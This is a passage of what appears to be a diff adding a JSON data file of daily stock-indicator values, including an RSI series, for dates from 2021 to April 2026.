"2025-01-17", + 62.12924229872547 + ], + [ + "2025-01-21", + 43.958462527710886 + ], + [ + "2025-01-22", + 45.61820849097198 + ], + [ + "2025-01-23", + 44.798211211971214 + ], + [ + "2025-01-24", + 44.4375870826838 + ], + [ + "2025-01-27", + 54.09561476556794 + ], + [ + "2025-01-28", + 57.72187624121471 + ], + [ + "2025-01-29", + 55.36359002755087 + ], + [ + "2025-01-30", + 52.92950928777241 + ], + [ + "2025-01-31", + 51.68833249011819 + ], + [ + "2025-02-03", + 52.72645351015151 + ], + [ + "2025-02-04", + 51.18055250295891 + ], + [ + "2025-02-05", + 49.58553316942287 + ], + [ + "2025-02-06", + 44.430715081474254 + ], + [ + "2025-02-07", + 47.37911814232764 + ], + [ + "2025-02-10", + 44.39245479380122 + ], + [ + "2025-02-11", + 44.21693504748862 + ], + [ + "2025-02-12", + 44.075025494116844 + ], + [ + "2025-02-13", + 39.470868401589264 + ], + [ + "2025-02-14", + 38.19715816219845 + ], + [ + "2025-02-18", + 34.43908054120175 + ], + [ + "2025-02-19", + 34.164517262288285 + ], + [ + "2025-02-20", + 31.90118537806068 + ], + [ + "2025-02-21", + 39.515075764480265 + ], + [ + "2025-02-24", + 41.160326550378734 + ], + [ + "2025-02-25", + 28.987190425954424 + ], + [ + "2025-02-26", + 24.379299006798057 + ], + [ + "2025-02-27", + 37.487744168489726 + ], + [ + "2025-02-28", + 41.849545801608514 + ], + [ + "2025-03-03", + 47.93309716447504 + ], + [ + "2025-03-04", + 47.46440148438506 + ], + [ + "2025-03-05", + 47.871850601602205 + ], + [ + "2025-03-06", + 55.98882208436016 + ], + [ + "2025-03-07", + 56.51930320387626 + ], + [ + "2025-03-10", + 70.1223187349122 + ], + [ + "2025-03-11", + 66.4595483683759 + ], + [ + "2025-03-12", + 69.91221922392943 + ], + [ + "2025-03-13", + 71.39652307615097 + ], + [ + "2025-03-14", + 77.04697413054126 + ], + [ + "2025-03-17", + 77.68239135841291 + ], + [ + "2025-03-18", + 78.31296628928177 + ], + [ + "2025-03-19", + 81.9985973251475 + ], + [ + "2025-03-20", + 82.0264627004756 + ], + [ + "2025-03-21", + 79.99625950118921 + ], + [ + "2025-03-24", + 86.07834039621962 + ], + [ + "2025-03-25", + 85.67305226828621 + ], + [ + "2025-03-26", + 88.23216367636988 + ], + [ + "2025-03-27", + 81.3858795792377 + ], + [ + "2025-03-28", + 83.9313993621237 + ], + [ + "2025-03-31", + 80.37861389865044 + ], + [ + "2025-04-01", + 81.55543979599057 + ], + [ + "2025-04-02", + 79.97216984580967 + ], + [ + "2025-04-03", + 100.0 + ], + [ + "2025-04-04", + 100.0 + ], + [ + "2025-04-07", + 93.87346769961931 + ], + [ + "2025-04-08", + 95.04746660262839 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 99.3532410429955 + ], + [ + "2025-04-14", + 99.37595864725643 + ], + [ + "2025-04-15", + 98.85956772907645 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 98.44854645220488 + ], + [ + "2025-04-29", + 98.51210968157075 + ], + [ + "2025-04-30", + 98.41494212337545 + ], + [ + "2025-05-01", + 98.56674673376027 + ], + [ + "2025-05-02", + 91.80286059250497 + ], + [ + "2025-05-05", + 81.21212060886371 + ], + [ + "2025-05-06", + 81.82111258331491 + ], + [ + "2025-05-07", + 80.07584970623346 + ], + [ + "2025-05-08", + 38.323871358763114 + ], + [ + "2025-05-09", + 28.57981746356493 + ], + [ + "2025-05-12", + 34.24257672120857 + ], + [ + "2025-05-13", + 34.676612679767295 + ], + [ + "2025-05-14", + 34.56367997751205 + ], + [ + "2025-05-15", + 27.544698436743897 + ], + [ + "2025-05-16", + 27.182372854394494 + ], + [ + "2025-05-19", + 20.89195741706473 + ], + [ + "2025-05-20", + 19.947802402407465 + ], + [ + "2025-05-21", + 21.295771677477727 + ], + [ + "2025-05-22", + 17.761503865588814 + ], + [ + "2025-05-23", + 18.78455182423461 + ], + [ + "2025-05-27", + 21.083589635132565 + ], + [ + "2025-05-28", + 21.571696247024224 + ], + [ + "2025-05-29", + 21.500659345565122 + ], + [ + "2025-05-30", + 21.36126138685837 + ], + [ + "2025-06-02", + 20.50897233037623 + ], + [ + "2025-06-03", + 20.02322684720015 + ], + [ + "2025-06-04", + 18.734255400800816 + ], + [ + "2025-06-05", + 19.741245989676454 + ], + [ + "2025-06-06", + 17.089299587993327 + ], + [ + "2025-06-09", + 16.97008419651694 + ], + [ + "2025-06-10", + 5.661437160060059 + ], + [ + "2025-06-11", + 4.132561317670838 + ], + [ + "2025-06-12", + 3.924887256616932 + ], + [ + "2025-06-13", + 5.821345390158383 + ], + [ + "2025-06-16", + 7.290101447938091 + ], + [ + "2025-06-17", + 8.3481235077653 + ], + [ + "2025-06-18", + 8.20339797295984 + ], + [ + "2025-06-20", + 6.419806148878069 + ], + [ + "2025-06-23", + 7.189592554058296 + ], + [ + "2025-06-24", + 7.445841924776805 + ], + [ + "2025-06-25", + 3.006888735810611 + ], + [ + "2025-06-26", + 3.088884972083429 + ], + [ + "2025-06-27", + 3.085741402189085 + ], + [ + "2025-06-30", + 3.0097320597938477 + ], + [ + "2025-07-01", + 4.055282292788644 + ], + [ + "2025-07-02", + 3.932331229731725 + ], + [ + "2025-07-03", + 4.456810365945907 + ], + [ + "2025-07-07", + 4.386554332331767 + ], + [ + "2025-07-08", + 3.858493578531224 + ], + [ + "2025-07-09", + 4.095409813711991 + ], + [ + "2025-07-10", + 4.032805375618382 + ], + [ + "2025-07-11", + 3.3957076822593466 + ], + [ + "2025-07-14", + 1.953651904886685 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.06941545546547276 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.16988387208604697 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 0.38457280898306934 + ], + [ + "2025-08-01", + 5.3980918596510445 + ], + [ + "2025-08-04", + 8.493221308682916 + ], + [ + "2025-08-05", + 9.135878876565007 + ], + [ + "2025-08-06", + 10.170226356459162 + ], + [ + "2025-08-07", + 10.162947977650573 + ], + [ + "2025-08-08", + 10.587169385641431 + ], + [ + "2025-08-11", + 10.745106179704603 + ], + [ + "2025-08-12", + 11.838432981565912 + ], + [ + "2025-08-13", + 11.848790812019207 + ], + [ + "2025-08-14", + 11.563955890774684 + ], + [ + "2025-08-15", + 11.859205341953329 + ], + [ + "2025-08-18", + 11.738598405948629 + ], + [ + "2025-08-19", + 13.32543394846511 + ], + [ + "2025-08-20", + 13.548942188767901 + ], + [ + "2025-08-21", + 13.68622074478038 + ], + [ + "2025-08-22", + 15.556853624394689 + ], + [ + "2025-08-25", + 15.564213027147572 + ], + [ + "2025-08-26", + 15.648314922582983 + ], + [ + "2025-08-27", + 15.653880128677386 + ], + [ + "2025-08-28", + 15.581517444345655 + ], + [ + "2025-08-29", + 13.227063627559655 + ], + [ + "2025-09-02", + 11.130362862522633 + ], + [ + "2025-09-03", + 11.139072139254226 + ], + [ + "2025-09-04", + 10.45262299889192 + ], + [ + "2025-09-05", + 10.373953249636344 + ], + [ + "2025-09-08", + 9.810944636889532 + ], + [ + "2025-09-09", + 9.752142135773436 + ], + [ + "2025-09-10", + 8.191135985613187 + ], + [ + "2025-09-11", + 8.527537496163959 + ], + [ + "2025-09-12", + 8.670783178778226 + ], + [ + "2025-09-15", + 8.988935802017975 + ], + [ + "2025-09-16", + 9.007071581255545 + ], + [ + "2025-09-17", + 6.601249903433502 + ], + [ + "2025-09-18", + 6.386609297786909 + ], + [ + "2025-09-19", + 5.911428422034903 + ], + [ + "2025-09-22", + 4.048838694346394 + ], + [ + "2025-09-23", + 4.7950004237850425 + ], + [ + "2025-09-24", + 5.1846907213888365 + ], + [ + "2025-09-25", + 5.687123252893571 + ], + [ + "2025-09-26", + 5.505173031846193 + ], + [ + "2025-09-29", + 2.9103692258598413 + ], + [ + "2025-09-30", + 0.9381066021620812 + ], + [ + "2025-10-01", + 0.5798470557236287 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 0.8191780626793574 + ], + [ + "2025-10-06", + 1.1678822334773984 + ], + [ + "2025-10-07", + 2.0941939914220766 + ], + [ + "2025-10-08", + 3.2847151441238163 + ], + [ + "2025-10-09", + 3.325189593637886 + ], + [ + "2025-10-10", + 16.69224882580382 + ], + [ + "2025-10-13", + 19.438252975003127 + ], + [ + "2025-10-14", + 19.82397236475636 + ], + [ + "2025-10-15", + 20.02557701534113 + ], + [ + "2025-10-16", + 19.669832330463347 + ], + [ + "2025-10-17", + 19.646431485506504 + ], + [ + "2025-10-20", + 20.48323328153797 + ], + [ + "2025-10-21", + 20.087945480690454 + ], + [ + "2025-10-22", + 20.75073426578712 + ], + [ + "2025-10-23", + 20.91457026124547 + ], + [ + "2025-10-24", + 21.415736605616097 + ], + [ + "2025-10-27", + 23.02550695915481 + ], + [ + "2025-10-28", + 23.19941255277584 + ], + [ + "2025-10-29", + 23.188132989168 + ], + [ + "2025-10-30", + 25.067033129596066 + ], + [ + "2025-10-31", + 24.86999896398059 + ], + [ + "2025-11-03", + 24.725245496454487 + ], + [ + "2025-11-04", + 27.336644218129535 + ], + [ + "2025-11-05", + 26.89236962914257 + ], + [ + "2025-11-06", + 28.986701489675422 + ], + [ + "2025-11-07", + 21.1703457818518 + ], + [ + "2025-11-10", + 21.35738050860451 + ], + [ + "2025-11-11", + 20.99485411428481 + ], + [ + "2025-11-12", + 20.84876939417025 + ], + [ + "2025-11-13", + 23.821685546753113 + ], + [ + "2025-11-14", + 23.602323040162325 + ], + [ + "2025-11-17", + 23.010943221450788 + ], + [ + "2025-11-18", + 23.79707182751672 + ], + [ + "2025-11-19", + 23.573103480223274 + ], + [ + "2025-11-20", + 26.13649233174468 + ], + [ + "2025-11-21", + 25.73486665370875 + ], + [ + "2025-11-24", + 27.848740882607615 + ], + [ + "2025-11-25", + 27.69182494056322 + ], + [ + "2025-11-26", + 28.120951428725288 + ], + [ + "2025-11-28", + 27.397292313050375 + ], + [ + "2025-12-01", + 27.24513913469686 + ], + [ + "2025-12-02", + 27.504294965496857 + ], + [ + "2025-12-03", + 25.126019592539393 + ], + [ + "2025-12-04", + 24.880984371080682 + ], + [ + "2025-12-05", + 22.602600332980465 + ], + [ + "2025-12-08", + 22.532412738259023 + ], + [ + "2025-12-09", + 19.399435613737033 + ], + [ + "2025-12-10", + 19.428149174991496 + ], + [ + "2025-12-11", + 19.5099936843456 + ], + [ + "2025-12-12", + 19.2002474466871 + ], + [ + "2025-12-15", + 19.400353760957458 + ], + [ + "2025-12-16", + 18.841963399109705 + ], + [ + "2025-12-17", + 20.35064963974356 + ], + [ + "2025-12-18", + 21.476579740448557 + ], + [ + "2025-12-19", + 17.746079928156316 + ], + [ + "2025-12-22", + 17.591948180147547 + ], + [ + "2025-12-23", + 13.09123912952497 + ], + [ + "2025-12-24", + 12.89850427375817 + ], + [ + "2025-12-26", + 12.356583198265369 + ], + [ + "2025-12-29", + 12.181258136728058 + ], + [ + "2025-12-30", + 12.14902578598263 + ], + [ + "2025-12-31", + 12.189741792954749 + ], + [ + "2026-01-02", + 12.11996778541917 + ], + [ + "2026-01-05", + 12.810812459402568 + ], + [ + "2026-01-06", + 13.40235143300648 + ], + [ + "2026-01-07", + 13.379139807733528 + ], + [ + "2026-01-08", + 13.647876694892435 + ], + [ + "2026-01-09", + 14.363895690829368 + ], + [ + "2026-01-12", + 14.283215473380004 + ], + [ + "2026-01-13", + 10.587317941776462 + ], + [ + "2026-01-14", + 11.534555884850949 + ], + [ + "2026-01-15", + 11.588375140421707 + ], + [ + "2026-01-16", + 7.525257665550614 + ], + [ + "2026-01-20", + 10.638374487702022 + ], + [ + "2026-01-21", + 10.673855496775525 + ], + [ + "2026-01-22", + 11.014968745320838 + ], + [ + "2026-01-23", + 10.885522786289924 + ], + [ + "2026-01-26", + 10.999357878959184 + ], + [ + "2026-01-27", + 11.714765414111222 + ], + [ + "2026-01-28", + 11.468074135451973 + ], + [ + "2026-01-29", + 11.807347343185144 + ], + [ + "2026-01-30", + 12.551509009373902 + ], + [ + "2026-02-02", + 12.80249798284115 + ], + [ + "2026-02-03", + 14.553707609186727 + ], + [ + "2026-02-04", + 16.087244257610305 + ], + [ + "2026-02-05", + 17.223147793432332 + ], + [ + "2026-02-06", + 20.743338674656904 + ], + [ + "2026-02-09", + 20.462236113082454 + ], + [ + "2026-02-10", + 20.517775205996486 + ], + [ + "2026-02-11", + 20.612965032067148 + ], + [ + "2026-02-12", + 22.490823019676963 + ], + [ + "2026-02-13", + 22.384438510375183 + ], + [ + "2026-02-17", + 22.389152125259198 + ], + [ + "2026-02-18", + 20.087228139931906 + ], + [ + "2026-02-19", + 18.764254538266805 + ], + [ + "2026-02-20", + 18.89749922567637 + ], + [ + "2026-02-23", + 19.58825724117603 + ], + [ + "2026-02-24", + 20.4165863902069 + ], + [ + "2026-02-25", + 21.334933290895304 + ], + [ + "2026-02-26", + 21.87762868237024 + ], + [ + "2026-02-27", + 21.78494592975489 + ], + [ + "2026-03-02", + 21.06654750101001 + ], + [ + "2026-03-03", + 21.147997824023605 + ], + [ + "2026-03-04", + 21.562538935566 + ], + [ + "2026-03-05", + 19.507993804105087 + ], + [ + "2026-03-06", + 19.706405332791032 + ], + [ + "2026-03-09", + 17.7846565524749 + ], + [ + "2026-03-10", + 17.29034912092489 + ], + [ + "2026-03-11", + 17.15803196707246 + ], + [ + "2026-03-12", + 19.043105912126006 + ], + [ + "2026-03-13", + 16.39603687846279 + ], + [ + "2026-03-16", + 17.420204042398407 + ], + [ + "2026-03-17", + 17.607271566990416 + ], + [ + "2026-03-18", + 18.611566568424575 + ], + [ + "2026-03-19", + 18.58233128708931 + ], + [ + "2026-03-20", + 20.05888175904987 + ], + [ + "2026-03-23", + 20.539088250752783 + ], + [ + "2026-03-24", + 19.692710288414894 + ], + [ + "2026-03-25", + 18.30912033389744 + ], + [ + "2026-03-26", + 20.920434445209445 + ], + [ + "2026-03-27", + 22.73922743335387 + ], + [ + "2026-03-30", + 22.64321668747003 + ], + [ + "2026-03-31", + 30.252533693753875 + ], + [ + "2026-04-01", + 29.807886186341925 + ], + [ + "2026-04-02", + 29.84781878100295 + ], + [ + "2026-04-06", + 29.11728605598882 + ], + [ + "2026-04-07", + 27.985735724622014 + ], + [ + "2026-04-08", + 32.831335660445994 + ], + [ + "2026-04-09", + 33.05447818810173 + ], + [ + "2026-04-10", + 31.426684559734852 + ], + [ + "2026-04-13", + 31.47636787938417 + ], + [ + "2026-04-14", + 32.38747462335676 + ], + [ + "2026-04-15", + 33.03067669308783 + ], + [ + "2026-04-16", + 31.44719184974833 + ], + [ + "2026-04-17", + 31.576696758796814 + ], + [ + "2026-04-20", + 28.782651643074747 + ], + [ + "2026-04-21", + 28.97674042165249 + ], + [ + "2026-04-22", + 28.838516527823714 + ], + [ + "2026-04-23", + 29.49569571015431 + ] + ], + "rsi": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 0.0 + ], + [ + "2021-04-28", + 0.0 + ], + [ + "2021-04-29", + 6.053379813946037 + ], + [ + "2021-04-30", + 5.408881476091793 + ], + [ + "2021-05-03", + 4.950671239241132 + ], + [ + "2021-05-04", + 3.788896732663787 + ], + [ + "2021-05-05", + 3.6210091579644086 + ], + [ + "2021-05-06", + 12.906575735572872 + ], + [ + "2021-05-07", + 21.716995729137494 + ], + [ + "2021-05-10", + 16.184832624801118 + ], + [ + "2021-05-11", + 15.951504974482646 + ], + [ + "2021-05-12", + 12.36084553771363 + ], + [ + "2021-05-13", + 18.135048062309522 + ], + [ + "2021-05-14", + 32.0164418938255 + ], + [ + "2021-05-17", + 30.454540255042602 + ], + [ + "2021-05-18", + 28.782132233128678 + ], + [ + "2021-05-19", + 29.486590577468746 + ], + [ + "2021-05-20", + 40.22664760433944 + ], + [ + "2021-05-21", + 38.39003076522265 + ], + [ + "2021-05-24", + 46.360206737662416 + ], + [ + "2021-05-25", + 46.97807631403978 + ], + [ + "2021-05-26", + 48.58607883500974 + ], + [ + "2021-05-27", + 46.93418061626447 + ], + [ + "2021-05-28", + 48.517663679116325 + ], + [ + "2021-06-01", + 46.923632063988265 + ], + [ + "2021-06-02", + 48.00096510536689 + ], + [ + "2021-06-03", + 42.98472609302521 + ], + [ + "2021-06-04", + 51.74848603556223 + ], + [ + "2021-06-07", + 53.13388351229807 + ], + [ + "2021-06-08", + 53.36460274269949 + ], + [ + "2021-06-09", + 53.48784941106672 + ], + [ + "2021-06-10", + 58.652680058925526 + ], + [ + "2021-06-11", + 59.86953669066998 + ], + [ + "2021-06-14", + 64.05538649972061 + ], + [ + "2021-06-15", + 59.45986673461652 + ], + [ + "2021-06-16", + 57.0126058869136 + ], + [ + "2021-06-17", + 62.734124343625815 + ], + [ + "2021-06-18", + 57.569622792492716 + ], + [ + "2021-06-21", + 60.33296575636987 + ], + [ + "2021-06-22", + 64.12996469686102 + ], + [ + "2021-06-23", + 64.32478853212233 + ], + [ + "2021-06-24", + 66.78120667724284 + ], + [ + "2021-06-25", + 65.80522309935762 + ], + [ + "2021-06-28", + 70.40831654866106 + ], + [ + "2021-06-29", + 71.6462051255316 + ], + [ + "2021-06-30", + 70.2612580570499 + ], + [ + "2021-07-01", + 70.41521833421304 + ], + [ + "2021-07-02", + 74.54166310098236 + ], + [ + "2021-07-06", + 75.91918232771087 + ], + [ + "2021-07-07", + 76.58808500447788 + ], + [ + "2021-07-08", + 70.53555318046696 + ], + [ + "2021-07-09", + 72.90490481231288 + ], + [ + "2021-07-12", + 74.30558213309828 + ], + [ + "2021-07-13", + 74.30558213309828 + ], + [ + "2021-07-14", + 74.99668063362074 + ], + [ + "2021-07-15", + 67.34446145460673 + ], + [ + "2021-07-16", + 59.81811138345509 + ], + [ + "2021-07-19", + 53.37214160076267 + ], + [ + "2021-07-20", + 59.91339518349476 + ], + [ + "2021-07-21", + 63.609685509339094 + ], + [ + "2021-07-22", + 66.48157638933714 + ], + [ + "2021-07-23", + 70.88206414000597 + ], + [ + "2021-07-26", + 71.16031356636483 + ], + [ + "2021-07-27", + 62.199457721643064 + ], + [ + "2021-07-28", + 63.8881883025937 + ], + [ + "2021-07-29", + 64.67716452616114 + ], + [ + "2021-07-30", + 60.494569362217675 + ], + [ + "2021-08-02", + 60.537687190089855 + ], + [ + "2021-08-03", + 63.6856403321769 + ], + [ + "2021-08-04", + 64.41860116062468 + ], + [ + "2021-08-05", + 67.52259099857514 + ], + [ + "2021-08-06", + 63.3826074912119 + ], + [ + "2021-08-09", + 64.3701744595985 + ], + [ + "2021-08-10", + 59.56210833521639 + ], + [ + "2021-08-11", + 58.00678477588332 + ], + [ + "2021-08-12", + 60.343217376274566 + ], + [ + "2021-08-13", + 62.53722544144235 + ], + [ + "2021-08-16", + 62.81208170067804 + ], + [ + "2021-08-17", + 54.12720518451382 + ], + [ + "2021-08-18", + 46.6100021386899 + ], + [ + "2021-08-19", + 50.30505178158679 + ], + [ + "2021-08-20", + 57.18041224422703 + ], + [ + "2021-08-23", + 64.82589909671876 + ], + [ + "2021-08-24", + 66.1740946976465 + ], + [ + "2021-08-25", + 66.69260855417838 + ], + [ + "2021-08-26", + 61.10849194999914 + ], + [ + "2021-08-27", + 65.79919237803588 + ], + [ + "2021-08-30", + 70.29667898402926 + ], + [ + "2021-08-31", + 69.57276959993699 + ], + [ + "2021-09-01", + 70.24314437392454 + ], + [ + "2021-09-02", + 69.77042333688627 + ], + [ + "2021-09-03", + 71.13133221304022 + ], + [ + "2021-09-07", + 71.76324177031037 + ], + [ + "2021-09-08", + 67.82573282858057 + ], + [ + "2021-09-09", + 64.09497932888131 + ], + [ + "2021-09-10", + 56.709990154743195 + ], + [ + "2021-09-13", + 56.081797412535636 + ], + [ + "2021-09-14", + 53.45758463021374 + ], + [ + "2021-09-15", + 58.863292474715614 + ], + [ + "2021-09-16", + 59.33720713425716 + ], + [ + "2021-09-17", + 48.884917227887506 + ], + [ + "2021-09-20", + 36.83648615013813 + ], + [ + "2021-09-21", + 37.79927305118878 + ], + [ + "2021-09-22", + 44.699009901505484 + ], + [ + "2021-09-23", + 50.584856644126994 + ], + [ + "2021-09-24", + 51.15913489323533 + ], + [ + "2021-09-27", + 46.23045867115801 + ], + [ + "2021-09-28", + 33.87115201886817 + ], + [ + "2021-09-29", + 33.330942834489974 + ], + [ + "2021-09-30", + 32.0974610910187 + ], + [ + "2021-10-01", + 36.36279701754588 + ], + [ + "2021-10-04", + 29.554348435454827 + ], + [ + "2021-10-05", + 37.49055286460131 + ], + [ + "2021-10-06", + 40.93777642080648 + ], + [ + "2021-10-07", + 45.594062265329164 + ], + [ + "2021-10-08", + 43.5653804362455 + ], + [ + "2021-10-11", + 40.58886066361864 + ], + [ + "2021-10-12", + 39.284494454186984 + ], + [ + "2021-10-13", + 43.739409454311975 + ], + [ + "2021-10-14", + 52.44954297079017 + ], + [ + "2021-10-15", + 55.06009947785591 + ], + [ + "2021-10-18", + 58.957415441309536 + ], + [ + "2021-10-19", + 61.6778669853622 + ], + [ + "2021-10-20", + 60.92227331730865 + ], + [ + "2021-10-21", + 63.19179455796709 + ], + [ + "2021-10-22", + 58.15652542855094 + ], + [ + "2021-10-25", + 62.08730965381347 + ], + [ + "2021-10-26", + 63.24267365458904 + ], + [ + "2021-10-27", + 64.11363279566686 + ], + [ + "2021-10-28", + 68.02620326288746 + ], + [ + "2021-10-29", + 69.62348380663678 + ], + [ + "2021-11-01", + 70.72358027507775 + ], + [ + "2021-11-02", + 72.06082342552966 + ], + [ + "2021-11-03", + 75.17420927322254 + ], + [ + "2021-11-04", + 78.34545742780507 + ], + [ + "2021-11-05", + 78.56775130373185 + ], + [ + "2021-11-08", + 77.35236778092023 + ], + [ + "2021-11-09", + 71.32429879456694 + ], + [ + "2021-11-10", + 60.5491264356658 + ], + [ + "2021-11-11", + 61.70711556708603 + ], + [ + "2021-11-12", + 65.81930044801774 + ], + [ + "2021-11-15", + 65.65300528379542 + ], + [ + "2021-11-16", + 68.34190443902216 + ], + [ + "2021-11-17", + 68.5401500467861 + ], + [ + "2021-11-18", + 72.2155959591006 + ], + [ + "2021-11-19", + 73.99455829197089 + ], + [ + "2021-11-22", + 64.65968388690229 + ], + [ + "2021-11-23", + 61.421623492435046 + ], + [ + "2021-11-24", + 62.83142445737897 + ], + [ + "2021-11-26", + 50.981079423097846 + ], + [ + "2021-11-29", + 60.08554705335734 + ], + [ + "2021-11-30", + 52.785562014110624 + ], + [ + "2021-12-01", + 45.92697210102149 + ], + [ + "2021-12-02", + 48.9042325676036 + ], + [ + "2021-12-03", + 42.744806331423185 + ], + [ + "2021-12-06", + 46.05776069089936 + ], + [ + "2021-12-07", + 56.35957364510515 + ], + [ + "2021-12-08", + 57.6913558243106 + ], + [ + "2021-12-09", + 52.04146742273376 + ], + [ + "2021-12-10", + 55.46068066482608 + ], + [ + "2021-12-13", + 50.274801692249966 + ], + [ + "2021-12-14", + 46.93752044708418 + ], + [ + "2021-12-15", + 54.091424800438354 + ], + [ + "2021-12-16", + 46.3308627586528 + ], + [ + "2021-12-17", + 45.016108408181694 + ], + [ + "2021-12-20", + 42.503250499848356 + ], + [ + "2021-12-21", + 49.44683037051957 + ], + [ + "2021-12-22", + 52.857775226078424 + ], + [ + "2021-12-23", + 54.91067166268129 + ], + [ + "2021-12-27", + 59.14278006908508 + ], + [ + "2021-12-28", + 57.48629384627571 + ], + [ + "2021-12-29", + 57.43076532734058 + ], + [ + "2021-12-30", + 56.25922481680981 + ], + [ + "2021-12-31", + 53.79716906235174 + ], + [ + "2022-01-03", + 56.90850313492678 + ], + [ + "2022-01-04", + 51.79847458405127 + ], + [ + "2022-01-05", + 42.24767810321181 + ], + [ + "2022-01-06", + 42.062469968529065 + ], + [ + "2022-01-07", + 39.211212966869255 + ], + [ + "2022-01-10", + 39.476669347564936 + ], + [ + "2022-01-11", + 45.34839565088208 + ], + [ + "2022-01-12", + 46.836658482614226 + ], + [ + "2022-01-13", + 39.49993950836647 + ], + [ + "2022-01-14", + 41.877859124321894 + ], + [ + "2022-01-18", + 35.78120365179872 + ], + [ + "2022-01-19", + 33.520168099295844 + ], + [ + "2022-01-20", + 31.049048600429956 + ], + [ + "2022-01-21", + 26.599292885329476 + ], + [ + "2022-01-24", + 28.373791631972168 + ], + [ + "2022-01-25", + 25.055485610308097 + ], + [ + "2022-01-26", + 24.849141679184868 + ], + [ + "2022-01-27", + 23.509296632460433 + ], + [ + "2022-01-28", + 35.12539486594413 + ], + [ + "2022-01-31", + 44.64401311901543 + ], + [ + "2022-02-01", + 46.49998732205677 + ], + [ + "2022-02-02", + 48.7261560621024 + ], + [ + "2022-02-03", + 39.76304235484686 + ], + [ + "2022-02-04", + 43.12645051675404 + ], + [ + "2022-02-07", + 41.51443915893111 + ], + [ + "2022-02-08", + 44.603684572750595 + ], + [ + "2022-02-09", + 50.02567040019477 + ], + [ + "2022-02-10", + 44.86761390684218 + ], + [ + "2022-02-11", + 38.943867130410936 + ], + [ + "2022-02-14", + 39.27044248981047 + ], + [ + "2022-02-15", + 45.569821877847936 + ], + [ + "2022-02-16", + 45.51687751625573 + ], + [ + "2022-02-17", + 39.67374578462152 + ], + [ + "2022-02-18", + 37.73290807614339 + ], + [ + "2022-02-22", + 36.07827987314158 + ], + [ + "2022-02-23", + 32.234837409421814 + ], + [ + "2022-02-24", + 40.901709568723845 + ], + [ + "2022-02-25", + 44.5447849695171 + ], + [ + "2022-02-28", + 45.25376121802132 + ], + [ + "2022-03-01", + 42.25454604966138 + ], + [ + "2022-03-02", + 46.38403796756695 + ], + [ + "2022-03-03", + 43.48519390544689 + ], + [ + "2022-03-04", + 40.74295976218982 + ], + [ + "2022-03-07", + 34.8133732271763 + ], + [ + "2022-03-08", + 34.163430807327074 + ], + [ + "2022-03-09", + 42.99792367206899 + ], + [ + "2022-03-10", + 41.09977818446331 + ], + [ + "2022-03-11", + 37.782576651716525 + ], + [ + "2022-03-14", + 35.02210389183266 + ], + [ + "2022-03-15", + 42.29542776810205 + ], + [ + "2022-03-16", + 49.690825686134374 + ], + [ + "2022-03-17", + 51.936532365422345 + ], + [ + "2022-03-18", + 55.58968600179322 + ], + [ + "2022-03-21", + 54.966080223972064 + ], + [ + "2022-03-22", + 58.500398691217136 + ], + [ + "2022-03-23", + 55.032216078042424 + ], + [ + "2022-03-24", + 59.020430859057 + ], + [ + "2022-03-25", + 58.80499103082349 + ], + [ + "2022-03-28", + 61.602863957370495 + ], + [ + "2022-03-29", + 64.53289242895454 + ], + [ + "2022-03-30", + 61.246893658737825 + ], + [ + "2022-03-31", + 57.73348166738796 + ], + [ + "2022-04-01", + 57.197688832410414 + ], + [ + "2022-04-04", + 61.36701756506568 + ], + [ + "2022-04-05", + 55.01480561089946 + ], + [ + "2022-04-06", + 49.71606279233928 + ], + [ + "2022-04-07", + 50.268794111604265 + ], + [ + "2022-04-08", + 46.991072145446466 + ], + [ + "2022-04-11", + 42.062558736678604 + ], + [ + "2022-04-12", + 41.25032334544508 + ], + [ + "2022-04-13", + 46.574114961770455 + ], + [ + "2022-04-14", + 41.88252848920071 + ], + [ + "2022-04-18", + 42.08880639705066 + ], + [ + "2022-04-19", + 47.887250971078 + ], + [ + "2022-04-20", + 44.67371905235884 + ], + [ + "2022-04-21", + 40.57441505615267 + ], + [ + "2022-04-22", + 36.14724274774036 + ], + [ + "2022-04-25", + 39.5410554373324 + ], + [ + "2022-04-26", + 33.785797442053905 + ], + [ + "2022-04-27", + 33.62477774416247 + ], + [ + "2022-04-28", + 42.37917613167922 + ], + [ + "2022-04-29", + 35.722207268755525 + ], + [ + "2022-05-02", + 39.357199072377526 + ], + [ + "2022-05-03", + 39.596336843622346 + ], + [ + "2022-05-04", + 46.764584687582364 + ], + [ + "2022-05-05", + 39.07468330684851 + ], + [ + "2022-05-06", + 37.57166520534098 + ], + [ + "2022-05-09", + 33.14180430615538 + ], + [ + "2022-05-10", + 35.582089802782534 + ], + [ + "2022-05-11", + 32.43213924552346 + ], + [ + "2022-05-12", + 32.19468628708698 + ], + [ + "2022-05-13", + 39.63659895012252 + ], + [ + "2022-05-16", + 38.173036216957 + ], + [ + "2022-05-17", + 43.16446045589116 + ], + [ + "2022-05-18", + 36.92272436135414 + ], + [ + "2022-05-19", + 36.335425141235525 + ], + [ + "2022-05-20", + 35.97985493393833 + ], + [ + "2022-05-23", + 39.386712085419106 + ], + [ + "2022-05-24", + 36.655765166744885 + ], + [ + "2022-05-25", + 39.56309309327579 + ], + [ + "2022-05-26", + 45.01847102413645 + ], + [ + "2022-05-27", + 50.80774936319677 + ], + [ + "2022-05-31", + 50.32877838842105 + ], + [ + "2022-06-01", + 48.94701099574661 + ], + [ + "2022-06-02", + 53.95112347143804 + ], + [ + "2022-06-03", + 48.91134338780429 + ], + [ + "2022-06-06", + 49.544257775078144 + ], + [ + "2022-06-07", + 51.23457234216282 + ], + [ + "2022-06-08", + 49.72499841876498 + ], + [ + "2022-06-09", + 44.50651042200896 + ], + [ + "2022-06-10", + 38.87569202747313 + ], + [ + 